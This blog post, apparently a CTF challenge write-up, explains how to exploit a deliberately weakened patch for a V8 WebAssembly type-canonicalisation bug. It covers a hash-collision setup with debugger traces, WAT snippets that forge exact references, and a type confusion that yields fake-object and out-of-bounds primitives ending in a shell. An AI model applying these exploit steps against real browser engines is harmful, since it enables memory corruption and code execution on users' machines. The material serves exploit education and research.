26 February 2026

Ok, so the description of this part from the previous blogpost is a bit clickbait-ish. Since the original challenge has writeups and RCE exploits floating around on the Internet, I figured that I could do the organisers a favour and modify the challenge such that script kiddies couldn’t just score an easy win. I personally think this modified challenge takes a bit of thinking, but ultimately, the later parts of the exploit are largely the same. Also, I’m really sorry if anyone thought these two posts would be about 0days or anything; there’s nothing super interesting here, and it’s a little artificial.

The commit we will be using is the same as in the previous write-up, which is this. The idea for my modified challenge came from a question: can we exploit CVE-2025-5959 without using the nullability approach? To try this, we shoddily patch CVE-2025-5959 as follows:

diff --git a/src/wasm/canonical-types.h b/src/wasm/canonical-types.h

index 9a520aa59b7..230c38b7373 100644

--- a/src/wasm/canonical-types.h

+++ b/src/wasm/canonical-types.h

@@ -357,7 +357,7 @@ class TypeCanonicalizer {

const bool indexed = type1.has_index();

if (indexed != type2.has_index()) return false;

if (indexed) {

- return type1.is_equal_except_index(type2) &&

+ return (type1.is_nullable() == type2.is_nullable()) &&

EqualTypeIndex(type1.ref_index(), type2.ref_index());

}

return type1 == type2;

Of course, V8 devs wouldn’t be this haphazard in their patching. By default, I don’t think this patch will be an issue. However, what if we passed the flag --experimental-wasm-custom-descriptors to d8?

That seemed like it came out of absolutely nowhere, but hear me out. The correctly patched code checks for the equality of everything but the type indices, and then does a special check for the type indices. My patch only checks for nullability apart from the type indices. What is not being checked?

// bits 0-1: TypeKind: numeric, indexed ref, generic ref, or sentinel. The bits

// are chosen such that they can also be interpreted as:

// bit 0: is it a reference of some sort?

// bit 1: if it's a reference: does it have an index?

// if it isn't a reference: is it an internal sentinel?

//

// bit 2: if it's a reference, is it nullable? Otherwise: unused.

// bit 3: if it's a reference, is it an exact reference? Otherwise: unused.

// For indexed (aka user defined) types, the next two fields cache information

// that could also be looked up in the module's definition of the type:

// bit 4: is it a shared type? Note that we consider numeric types as shared,

// i.e. "shared" means "safe to use in a shared function".

// bits 5-7: RefTypeKind: if it's a reference (indexed or generic), what

// category of type (struct/array/function/continuation) is it?

// Non-reference types store the value "kOther".

// bits 8-27: For indexed types, the index. For other types, the StandardType.

// The "ValueType" subclass stores module-specific indices, the

// "CanonicalValueType" stores canonicalized indices.

// For non-indexed types, we also define their respective

// "NumericKind" or "GenericKind", which in addition to the right

// StandardType include the other relevant lower bits.

That’s a huge chunk of text. Let’s dissect it.

// bits 0-1: TypeKind: numeric, indexed ref, generic ref, or sentinel. The bits

// are chosen such that they can also be interpreted as:

// bit 0: is it a reference of some sort?

// bit 1: if it's a reference: does it have an index?

// if it isn't a reference: is it an internal sentinel?

Bits 0-1 wouldn’t work in an exploit as their values will influence the type index (bits 8-27). If they differ for the fields in two structures, EqualTypeIndex will definitely return false for the fields too.

// bits 5-7: RefTypeKind: if it's a reference (indexed or generic), what

// category of type (struct/array/function/continuation) is it?

// Non-reference types store the value "kOther".

What about bits 5-7? Honestly, my memory is a bit hazy since I designed this challenge a few months back. From what I can tell, if two references have different types, their type indices will definitely not match, so this suffers from the same issue as bits 0-1.

// bit 3: if it's a reference, is it an exact reference? Otherwise: unused.

// For indexed (aka user defined) types, the next two fields cache information

// that could also be looked up in the module's definition of the type:

// bit 4: is it a shared type? Note that we consider numeric types as shared,

// i.e. "shared" means "safe to use in a shared function".

Since nullability is checked, that leaves us with bits 3 and 4. Let’s start with bit 4, sharedness, which is described in the WASM Shared-Everything Threads Proposal. We can enable it in V8 with --experimental-wasm-shared. The reason it wouldn’t work for exploitation is the same as the other bits, due to one line in the proposal:

“Since heap types already include sharedness, reference types do not need their own additional shared annotations.”

From what I understand, the sharedness of a reference is also the sharedness of the type it references. If two references have different sharedness, that means they are referencing different types, and again, their type indices will not match.
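To make the gap between the two checks concrete, here is a minimal sketch of my own (not V8's code). It models a value type as a raw integer laid out as in the quoted comment, covers only the indexed-reference branch of the comparison, and replaces EqualTypeIndex with a plain index comparison. All constant and function names are made up for illustration, and the two raw values are just sample encodings that differ in bit 3.

```cpp
#include <cstdint>

// Field positions follow the quoted layout comment; all names are made up.
constexpr uint32_t kNullableBit = 1u << 2;      // bit 2
constexpr uint32_t kExactBit = 1u << 3;         // bit 3
constexpr uint32_t kNonIndexMask = 0xFFu;       // bits 0-7
constexpr uint32_t kIndexMask = 0xFFFFFu << 8;  // bits 8-27

constexpr uint32_t IndexOf(uint32_t raw) { return (raw & kIndexMask) >> 8; }

// Stand-in for EqualTypeIndex: this toy just compares the stored indices.
constexpr bool SameIndex(uint32_t a, uint32_t b) {
  return IndexOf(a) == IndexOf(b);
}

// Properly patched behaviour: every non-index bit must match.
constexpr bool EqualProper(uint32_t a, uint32_t b) {
  return (a & kNonIndexMask) == (b & kNonIndexMask) && SameIndex(a, b);
}

// Shoddy patch: only nullability is compared besides the index.
constexpr bool EqualShoddy(uint32_t a, uint32_t b) {
  return (a & kNullableBit) == (b & kNullableBit) && SameIndex(a, b);
}

// Sample encodings of an indexed, nullable reference that differ only in
// bit 3 (exactness).
constexpr uint32_t kInexact = 0x447;
constexpr uint32_t kExact = kInexact | kExactBit;  // 0x44f

static_assert(!EqualProper(kInexact, kExact), "proper check sees bit 3");
static_assert(EqualShoddy(kInexact, kExact), "shoddy check misses bit 3");
```

In this model, the only bit that can differ while the shoddy comparison still passes and the index still matches is bit 3, assuming the reasoning above about bits 0-1, 4 and 5-7 holds.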

This leaves us with exact-ness, defined in the Custom Descriptors proposal. As the proposal is actively being refined, I chose to refer to an old version of it from September 2025, around the time I did the playtesting. From what I can tell, there have been some modifications since then that would break the code used in this write-up. The feature can be enabled by passing --experimental-wasm-custom-descriptors to d8. For completeness, the version of wasm-as from binaryen I am using is wasm-as version 123 (version_123-334-g969bf763a).

Here’s a quick crash course on the proposal:

(rec

(type $foo (sub (descriptor $foo.rtt (struct))))

(type $foo.rtt (sub (describes $foo (struct))))

)

We can now define descriptors (e.g. $foo.rtt) for types. The above syntax differs slightly from what is in the document, but it is the version that compiles in binaryen.

(rec

(type $foo (sub (descriptor $foo.rtt (struct))))

(type $foo.rtt (sub (describes $foo (struct))))

(type $bar (sub $foo (descriptor $bar.rtt (struct (field $bar-only i32)))))

(type $bar.rtt (sub $foo.rtt (describes $bar (struct))))

)

We can also now make one type the subtype of another using the sub keyword (inheritance). In the above sample, $bar is a subtype of $foo with one more field, and they have a type descriptor each.

A type descriptor can be used in the initialisation of an object:

(func $return_foo (result (ref null $foo))

(local $rtt (ref (exact $foo.rtt)))

(local.set $rtt (struct.new $foo.rtt))

(struct.new $foo (local.get $rtt))

)

The instruction struct.new can take two arguments. The first is the type of the object being allocated, while the second is the type descriptor object we use to initialise the object. At first, it seems kind of redundant to have a second argument (at least to me), since the type and type descriptor should match. However, the key is that we are passing type descriptor objects (e.g. an instance of $foo.rtt rather than $foo.rtt itself). Two $foo objects may be initialised with different instances of $foo.rtt.

Importantly, we also see the appearance of the keyword exact. I will just give a high-level overview of why this keyword is needed; those who would like the details on the type system can refer to the docs.

From my understanding, exact references can only point to objects of the type they are defined with. In the context of inheritance, this means that a reference ref (exact $typename) can point to neither objects of a subtype nor objects of a supertype of $typename. Object creation instructions, such as struct.new, require the type descriptor object to be passed as an exact reference, and return an exact reference as well. The reason for this is nicely demonstrated in the docs with this intentionally incorrect example (slightly modified for binaryen):
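As a rough mental model of the rule just described, here is a small sketch of how I picture the matching of exact and inexact references. It is a toy, not the proposal's formal rules: it ignores nullability and bottom types, and the names Hierarchy, RefType and Matches are hypothetical.

```cpp
#include <cassert>
#include <vector>

// Toy hierarchy: parent[i] is the declared supertype of type i, or -1.
struct Hierarchy {
  std::vector<int> parent;

  bool IsSubtype(int sub, int super) const {
    for (int t = sub; t != -1; t = parent[t]) {
      assert(t >= 0 && t < static_cast<int>(parent.size()));
      if (t == super) return true;
    }
    return false;
  }
};

struct RefType {
  int heap_type;  // index into Hierarchy::parent
  bool exact;
};

// May a value of static type `from` flow into a slot of type `to`?
bool Matches(const Hierarchy& h, RefType from, RefType to) {
  if (to.exact) {
    // An exact slot only accepts an exact reference to the very same type.
    return from.exact && from.heap_type == to.heap_type;
  }
  // An inexact slot accepts the type itself and any of its subtypes.
  return h.IsSubtype(from.heap_type, to.heap_type);
}
```

With type 0 standing for $foo.rtt and type 1 for $bar.rtt (parent 0), Matches accepts an exact $bar.rtt flowing into an inexact $foo.rtt slot, but rejects an inexact $foo.rtt flowing into an exact $foo.rtt slot.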

(rec

(type $foo (sub (descriptor $foo.rtt (struct))))

(type $foo.rtt (sub (describes $foo (struct))))

(type $bar (sub $foo (descriptor $bar.rtt (struct (field $bar-only i32)))))

(type $bar.rtt (sub $foo.rtt (describes $bar (struct))))

)

(func $unsound (result i32)

(local $rtt (ref $foo.rtt))

;; We can store a $bar.rtt in the local due to subtyping.

(local.set $rtt (struct.new $bar.rtt))

;; Allocate a $foo with a $foo.rtt that is actually a $bar.rtt.

(struct.new $foo (local.get $rtt))

;; Now cast the $foo to a $bar. This will succeed because it has an RTT for $bar.

(ref.cast (ref $bar))

;; Out-of-bounds read.

(struct.get $bar $bar-only)

)

If struct.new did not require exact type descriptors, we could allocate a $foo object in memory but initialise it with an instance of the type descriptor for $bar, which is a clear case of type confusion. The above code will not compile with wasm-as from binaryen by default:

$ binaryen/bin/wasm-as trythis.wat -all -o trythis.wasm --enable-gc --enable-reference-types

[wasm-validator error in function unsound] struct.new descriptor operand should have proper type, on

(struct.new_default $foo

(local.get $0)

)

Fatal: Error: input module is not valid.

$

At this point, one may be tempted to think that type checking is only done in the WAT assembler. If the WAT code somehow still got assembled into WASM, would V8 catch the issue? We can test it by providing -v none to wasm-as, which disables all validations. As we see below, V8 is able to catch the issue during module decoding, before the WASM code ever gets executed.

$ binaryen/bin/wasm-as trythis.wat -all -o trythis.wasm --enable-gc --enable-reference-types -v none

$ ./d8 --experimental-wasm-custom-descriptors trigger.js

V8 is running with experimental features enabled. Stability and security will suffer.

trigger.js:8: CompileError: WebAssembly.Module(): Compiling function #0 failed: struct.new_default[0] expected type (ref null exact 1), found local.get of type (ref 1) @+62

const aMod = new WebAssembly.Module(aBytes);

^

CompileError: WebAssembly.Module(): Compiling function #0 failed: struct.new_default[0] expected type (ref null exact 1), found local.get of type (ref 1) @+62

at trigger.js:8:14

$

Let’s trace where this error occurs. We can do this by setting a breakpoint on the WASM error constructor v8::internal::wasm::WasmError::WasmError. Following one of the backtraces, we arrive at this code:

int DecodeGCOpcode(WasmOpcode opcode, uint32_t opcode_length) {

// Bigger GC opcodes are handled via {DecodeStringRefOpcode}, so we can

// assume here that opcodes are within [0xfb00, 0xfbff].

// This assumption might help the big switch below.

V8_ASSUME(opcode >> 8 == kGCPrefix);

switch (opcode) {

case kExprStructNew: {

StructIndexImmediate imm(this, this->pc_ + opcode_length, validate);

if (!this->Validate(this->pc_ + opcode_length, imm)) return 0;

Value descriptor = PopDescriptor(imm.index);

PoppedArgVector args = PopArgs(imm.struct_type);

Value* value =

Push(ValueType::Ref(imm.heap_type()).AsExactIfProposalEnabled());

CALL_INTERFACE_IF_OK_AND_REACHABLE(StructNew, imm, descriptor,

args.data(), value);

return opcode_length + imm.length;

}

// <...more code follows...>

As we should know by now, the WASM instruction set operates on a stack machine model. When the module decoder encounters a struct.new instruction, it will first pop the type descriptor object off the stack. The first argument, the type, is not a stack object (it can’t be). From StructIndexImmediate, we see that the type is directly encoded in the struct.new instruction.

Value PopDescriptor(ModuleTypeIndex described_index) {

const TypeDefinition& type = this->module_->type(described_index);

if (!type.has_descriptor()) return Value{nullptr, kWasmVoid};

DCHECK(this->enabled_.has_custom_descriptors());

ValueType desc_type =

ValueType::RefNull(this->module_->heap_type(type.descriptor)).AsExact();

return Pop(desc_type);

}

In PopDescriptor, we see exactly (no pun intended) what the proposal requires. Pop takes an expected type as its only argument. If the value at the top of the stack does not match the expected type, it throws an error. By passing to it a desc_type that is (ref null (exact <type.descriptor>)), V8 enforces the requirement of an exact reference. This is how we got the CompileError as seen above.

So, is there a similar check at runtime (i.e. defence in depth)? For this write-up, we will be looking at WASM’s baseline compiler, Liftoff. While Liftoff generates machine code at runtime (i.e. JIT), it does not do optimisations (I think), and is used for WASM code that hasn’t been executed a lot. For struct.new, Liftoff in fact reuses the code in DecodeGCOpcode seen above, except that the macro CALL_INTERFACE_IF_OK_AND_REACHABLE now calls the following function:

void StructNew(FullDecoder* decoder, const StructIndexImmediate& imm,

const Value& descriptor, bool initial_values_on_stack) {

const TypeDefinition& type = decoder->module_->type(imm.index);

LiftoffRegister rtt = GetRtt(decoder, imm.index, type, descriptor);

if (type.is_descriptor()) {

// <...omitted...>

} else {

bool is_shared = type.is_shared;

CallBuiltin(is_shared ? Builtin::kWasmAllocateSharedStructWithRtt

: Builtin::kWasmAllocateStructWithRtt,

MakeSig::Returns(kRef).Params(kRef, kI32),

{VarState{kRef, rtt, 0},

VarState{kI32, WasmStruct::Size(imm.struct_type), 0}},

decoder->position());

}

// <...more code follows...>

For our case, where the struct is not shared, Liftoff emits an x64 call instruction to the builtin WasmAllocateStructWithRtt, seen here:

builtin WasmAllocateStructWithRtt(rtt: Map, instanceSize: int32): HeapObject {

const result: HeapObject = unsafe::Allocate(Convert<intptr>(instanceSize));

*UnsafeConstCast(&result.map) = rtt;

// TODO(ishell): consider removing properties_or_hash field from WasmObjects.

%RawDownCast<WasmStruct>(result).properties_or_hash = kEmptyFixedArray;

return result;

}

So, there’s no validation at runtime! As long as our code passes the static checking of the V8 WASM decoder, the object’s map field is set, giving it the type described by the type descriptor.
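Why this matters can be shown with a toy model (my own simplification, not V8's data structures). The allocation size comes from the instruction's immediate, the map comes from the operand, and a later cast only looks at the map. The types Rtt and Object and both functions are hypothetical, and the explicit size member exists only to make the mismatch visible.

```cpp
#include <cassert>
#include <cstdint>

enum TypeId : int { kFoo = 0, kBar = 1 };

struct Rtt {          // stand-in for the Map a descriptor provides
  TypeId describes;
  const Rtt* super;   // RTT of the supertype, or nullptr
};

struct Object {
  const Rtt* map;     // stamped at allocation, never validated afterwards
  uint32_t size;      // bytes actually reserved for the object
};

// Mirrors the shape of the builtin: nothing ties the size to the map.
Object AllocateWithRtt(const Rtt* rtt, uint32_t instance_size) {
  assert(rtt != nullptr);
  return Object{rtt, instance_size};
}

// A cast only walks the RTT chain of the map it finds in the object.
bool CastSucceeds(const Object& obj, TypeId target) {
  for (const Rtt* r = obj.map; r != nullptr; r = r->super) {
    if (r->describes == target) return true;
  }
  return false;
}
```

If an object is allocated with the size of $foo but the RTT of $bar, CastSucceeds(obj, kBar) returns true in this model even though the reserved bytes do not cover $bar's extra field.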

We can reuse the approach used to exploit CVE-2025-5959 here: create two structs that differ only in the exact-ness of their reference fields. With that, we can then recreate the incorrect example above, and achieve exactly what the proposal authors did not want. Hehe.

In the previous part of this two-part series, I omitted steps on how to trigger the vulnerability, as it was already well documented in the other write-ups. Since we are doing things slightly differently here, I’ll briefly showcase how we can do the MurmurHash collision.

(module

(rec

(type $foo (sub (descriptor $foo.rtt (struct))))

(type $foo.rtt (sub (describes $foo (struct))))

(type $bar (sub $foo (descriptor $bar.rtt (struct (field $bar-only i32)))))

(type $bar.rtt (sub $foo.rtt (describes $bar (struct))))

)

(rec

(type $make_rtt_exact

(struct

(field (mut (ref null $foo.rtt)))

;; <n more fields>

)

)

)

(func (export "test") (result (ref null $make_rtt_exact))

(struct.new_default $make_rtt_exact)

)

)

const aBytes = readbuffer("min_test.wasm");

const aMod = new WebAssembly.Module(aBytes);

const aInst = new WebAssembly.Instance(aMod, {});

aInst.exports.test()

The above WAT code can be compiled using binaryen (see commands further above) and loaded in d8 using the JavaScript snippet. Our goal is now to create two colliding copies of the $make_rtt_exact struct that transmute an inexact reference into an exact one. During hashing, V8 eventually calls this function on the struct:

void Add(const CanonicalStructType& struct_type) {

hasher.AddRange(struct_type.mutabilities());

for (const ValueTypeBase& field : struct_type.fields()) {

Add(CanonicalValueType{field});

}

}

The hasher first consumes the mutability attribute of each struct field, followed by the 28 bits of the value type of each field. If we want to do a birthday attack, we first need to fix the number of fields in our struct in order to keep the mutabilities constant. Each of the $n$ reference fields can then independently be exact or inexact, which gives us $2^n$ candidate structs to hash. I am not particularly good at Math, so we’ll rely on Wikipedia for this part: given an assumed uniformly random 64-bit hash function, if we were to hash all $2^n$ candidates, the probability $p$ of finding a collision can be calculated using $p = 1 - \exp(-\frac{2^{2n}}{2^{65}})$, according to here. At $n = 34$, we get $p \approx 0.99966$ (5 s.f.), which means we are very likely to find a collision. Otherwise, we can always increment $n$.
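For anyone who wants to play with other values of $n$, the formula is easy to evaluate. The helper below is a small sketch with a name of my own choosing; it assumes the same idealised 64-bit hash as the formula.

```cpp
#include <cassert>
#include <cmath>

// p = 1 - exp(-2^(2n) / 2^65) for 2^n inputs and an ideal 64-bit hash.
double CollisionProbability(int n) {
  assert(n >= 0);
  // 2^(2n) / 2^65 == 2^(2n - 65); ldexp(1.0, e) computes 2^e exactly.
  const double exponent = std::ldexp(1.0, 2 * n - 65);
  // -expm1(-x) equals 1 - exp(-x) but stays accurate when x is tiny.
  return -std::expm1(-exponent);
}
```

For comparison, $n = 32$ gives roughly 0.39 and $n = 33$ roughly 0.86, so 34 fields is the first count at which a collision is close to certain.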

After repeating (field (mut (ref null $foo.rtt))) 33 more times, we can set a breakpoint on Add(CanonicalValueType{field}); in the previous code snippet (canonical-types.h:276). If we step forward a few instructions (release mode V8 inlines the hashing function), we arrive at something like:

$rax : 0xc6a4a7935bd1e995

$rbx : 0x1610

<...omitted...>

→ 0x555556367af0 <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+240> imul rbx, rax

0x555556367af4 <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+244> mov r11, rbx

0x555556367af7 <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+247> shr r11, 0x2f

0x555556367afb <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+251> xor r11, rbx

0x555556367afe <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+254> imul r11, rax

0x555556367b02 <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+258> xor r11, r10

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:../../src/base/hashing.h+93 ────

88 seed = seed * 5 + 0xE6546B64;

89 #else

90 const uint64_t m = uint64_t{0xC6A4A7935BD1E995};

91 const uint32_t r = 47;

92

→ 93 hash *= m;

94 hash ^= hash >> r;

95 hash *= m;

96

97 seed ^= hash;

98 seed *= m;

───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────

[#0] Id 1, Name: "d8", stopped 0x555556367af0 in v8::base::hash_combine (), reason: BREAKPOINT

─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────

[#0] 0x555556367af0 → v8::base::hash_combine(seed=0x17aa18dcdfb20aea, hash=0x1610)

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

gef➤

We can see that the rbx register corresponds to the value being added to the hash. We don’t want this value, though; its LSB is 0, which means it’s not a reference. In fact, it is probably the i32 field of $bar. However, we can set a conditional breakpoint here that only fires when the LSB is 1, using b if $rbx & 1 == 1. We will then hit the breakpoint as such:

→ 0x555556367af0 <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+240> imul rbx, rax

0x555556367af4 <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+244> mov r11, rbx

0x555556367af7 <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+247> shr r11, 0x2f

0x555556367afb <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+251> xor r11, rbx

0x555556367afe <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+254> imul r11, rax

0x555556367b02 <v8::internal::wasm::TypeCanonicalizer::CanonicalHashing::Add(v8::internal::wasm::CanonicalStructType const&)+258> xor r11, r10

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:../../src/base/hashing.h+93 ────

88 seed = seed * 5 + 0xE6546B64;

89 #else

90 const uint64_t m = uint64_t{0xC6A4A7935BD1E995};

91 const uint32_t r = 47;

92

→ 93 hash *= m;

94 hash ^= hash >> r;

95 hash *= m;

96

97 seed ^= hash;

98 seed *= m;

───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────

[#0] Id 1, Name: "d8", stopped 0x555556367af0 in v8::base::hash_combine (), reason: BREAKPOINT

─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────

[#0] 0x555556367af0 → v8::base::hash_combine(seed=0xe5c4e0faffa3a6a6, hash=0x447)

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

gef➤

There we go! We now have an initial hash (0xe5c4e0faffa3a6a6), and we know the value of the inexact reference type (0x447). Since exact-ness flips bit 3, that makes 0x44f. If we plug these 3 values into brute.cc from the ZIP file in my previous blog post and run the C++ program on a fairly beefy machine, we should get a valid collision pair. From university, I recall that we should, on average, take around $\sqrt{\frac{\pi}{2}} \cdot 2^{32}$ tries, which is around 5 billion. Full disclosure, I vibe-coded the brute forcer entirely using the old ChatGPT 5, and it may produce invalid results or something occasionally. Feel free to write your own brute forcer or ask your favourite modern LLM to cook up something better.
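If you do want to write your own brute forcer, the core idea fits in a few lines. The sketch below is not brute.cc. The mixing step is copied from the hashing.h lines visible in the debugger output, while HashFields, FindTruncatedCollision and the mask encoding are my own hypothetical helpers. To finish instantly it only looks for a collision in the low bits of the hash, whereas the real search needs all 64 bits to agree and a far more memory-efficient strategy.

```cpp
#include <cassert>
#include <cstdint>
#include <unordered_map>
#include <utility>

// Mixing step as shown in the hashing.h excerpt (64-bit branch).
uint64_t HashCombine(uint64_t seed, uint64_t hash) {
  const uint64_t m = 0xC6A4A7935BD1E995ull;
  const uint32_t r = 47;
  hash *= m;
  hash ^= hash >> r;
  hash *= m;
  seed ^= hash;
  seed *= m;
  return seed;
}

// Folds n field values into the running hash. Bit i of `mask` selects the
// exact encoding for field i, otherwise the inexact one is used.
uint64_t HashFields(uint64_t seed, uint64_t mask, int n, uint32_t inexact,
                    uint32_t exact) {
  for (int i = 0; i < n; ++i) {
    seed = HashCombine(seed, ((mask >> i) & 1) ? exact : inexact);
  }
  return seed;
}

// Toy birthday search: returns two different masks whose hashes agree in the
// low `bits` bits. Terminates by pigeonhole because bits < n.
std::pair<uint64_t, uint64_t> FindTruncatedCollision(uint64_t seed, int n,
                                                     uint32_t inexact,
                                                     uint32_t exact,
                                                     int bits) {
  assert(bits >= 1 && bits < n && n <= 64);
  const uint64_t keep = (uint64_t{1} << bits) - 1;
  std::unordered_map<uint64_t, uint64_t> seen;  // truncated hash -> mask
  for (uint64_t mask = 0;; ++mask) {
    const uint64_t h = HashFields(seed, mask, n, inexact, exact) & keep;
    const auto result = seen.emplace(h, mask);
    if (!result.second) return {result.first->second, mask};
  }
}
```

Calling FindTruncatedCollision(0xe5c4e0faffa3a6a6, 34, 0x447, 0x44f, 16) returns a pair of masks after a few hundred candidates on average. Scaling the same idea to the full 64 bits is what requires billions of tries and a beefy machine.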

In my previous blog post, I placed the two colliding WASM structs in separate modules and used export functions in the modules to cause our type confusion. If we use this approach again, we can now turn an inexact reference into an exact one:

(module

;; <...omitted, see previous...>

(rec

(type $make_rtt_exact

(struct

(field (mut (ref null $foo.rtt))) ;; assuming exact in other module

;; <n more fields>

)

)

)

(func (export "test") (result (ref null $make_rtt_exact))

(struct.new_default $make_rtt_exact)

(local.set $ret)

(struct.new_default $bar.rtt)

(local.set $bar_rtt)

;; field 0 will be marked exact in the other module

(struct.set $make_rtt_exact 0 (local.get $ret) (local.get $bar_rtt))

(local.get $ret)

)

)

With the above example, we read field 0 of $make_rtt_exact from the other module after calling test. We can now make a $foo object with RTT $bar.rtt, which is game over. Exact references are a subset of inexact ones, so even though struct.new returns an exact reference, we don’t need to trigger the vulnerability a second time to convert an exact reference to an inexact one (i.e. the other way round). It suffices to do (local.set $foo_obj) after struct.new, where $foo_obj is (local $foo_obj (ref null $foo)), or inexact. We can now read out of bounds with $bar’s $bar-only field.



Field overlap between \$foo and \$fake_ptr


If we were to invoke struct.new again to allocate some new object, it will be placed in memory right after our corrupted $foo object. Let’s assume this object, named $fake_ptr, is a WASM struct with 1 i32 field. As we calculated in the previous post, its first field will start at offset 8. Now, if we prepend two i32 fields to $bar to make its $bar-only field the third field, the $bar-only field of our corrupted object will share the same memory location with $fake_ptr’s first field.
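The overlap is simple offset arithmetic, sketched below. The assumptions are taken from the text rather than from V8's headers: an 8-byte object header (so the first field sits at offset 8), 4-byte i32 fields, a zero-field $foo that occupies just its header, and back-to-back allocation. All names are made up for this sketch.

```cpp
#include <cstdint>

constexpr uint32_t kHeaderSize = 8;  // assumed: first field at offset 8
constexpr uint32_t kFieldSize = 4;   // assumed: i32 fields

constexpr uint32_t FieldOffset(uint32_t field_index) {
  return kHeaderSize + field_index * kFieldSize;
}

constexpr uint32_t ObjectSize(uint32_t field_count) {
  return kHeaderSize + field_count * kFieldSize;
}

// $foo has no fields, so the next allocation starts right after its header.
constexpr uint32_t kFakePtrStart = ObjectSize(0);

// First field of $fake_ptr, measured from the start of the corrupted $foo.
constexpr uint32_t kFakePtrField0 = kFakePtrStart + FieldOffset(0);

// $bar-only as the third field of $bar, after two prepended i32 fields.
constexpr uint32_t kBarOnly = FieldOffset(2);

static_assert(kFakePtrField0 == 16, "fake_ptr field 0 sits 16 bytes in");
static_assert(kBarOnly == kFakePtrField0, "the two fields overlap");
```

With only one prepended field, FieldOffset(1) would be 12 and land in the header of $fake_ptr instead, which is why two padding fields are needed under these assumptions.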

By setting $bar-only’s type to a reference, we can transform the 32-bit integer we store in $fake_ptr’s first field into a “pointer” to a WASM object. This is very similar to the fakeobj primitive commonly seen in JavaScript exploits, although that usually fakes JavaScript objects, not WASM ones.

gef➤ x/wx 0x00003fa100040000+0+8

0x3fa100040008: 0x570e7690

gef➤



Since I’m a bit lazy, I chose to make $bar-only a WASM array reference. This way, I can reuse the exploit from my previous post with 0 modifications. Instead of 0x120c, I chose 0x0 (which becomes 1, since tagged pointers have their LSB set), just because I felt like it. At 0x8, there is always a pointer whose lower 32 bits form a high enough array length for our needs. Hackish, I know.
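The address arithmetic behind that debugger command can be sketched as follows. This is a simplified model under my own assumptions: the base used in the gdb command is the base that compressed pointers are relative to, a tagged pointer has its LSB set, and a field is read at base + tagged - 1 + offset. The names Tag and FieldAddress are hypothetical.

```cpp
#include <cstdint>

constexpr uint64_t kHeapObjectTag = 1;

// Sets the tag bit on a 32-bit offset, as done for the fake "pointer".
constexpr uint32_t Tag(uint32_t offset) {
  return offset | static_cast<uint32_t>(kHeapObjectTag);
}

// Address of a field inside the object that `tagged` refers to.
constexpr uint64_t FieldAddress(uint64_t base, uint32_t tagged,
                                uint32_t field_offset) {
  return base + tagged - kHeapObjectTag + field_offset;
}

// Base and offsets as used in the gdb command above.
constexpr uint64_t kBase = 0x00003fa100040000ull;
static_assert(Tag(0) == 1, "offset 0 is stored as 1");
static_assert(FieldAddress(kBase, Tag(0), 8) == 0x3fa100040008ull,
              "field at offset 8 of the fake array");
```

Under these assumptions, the word at that address is what the fake array at offset 0 reports as its length.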

We’ve seen it once, let’s see it again:

Yay shell v2 (ignore the folders)


In another timeline, the custom descriptors proposal may have been in the WASM specs by the time CVE-2025-5959 was discovered, at which point the approach detailed here could be used as an alternate exploitation method. In the end, my modification to the challenge didn’t make it into the CTF, although I have no doubt the top player would’ve solved it anyway. As usual, I’ve attached the exploit here, so feel free to check it out.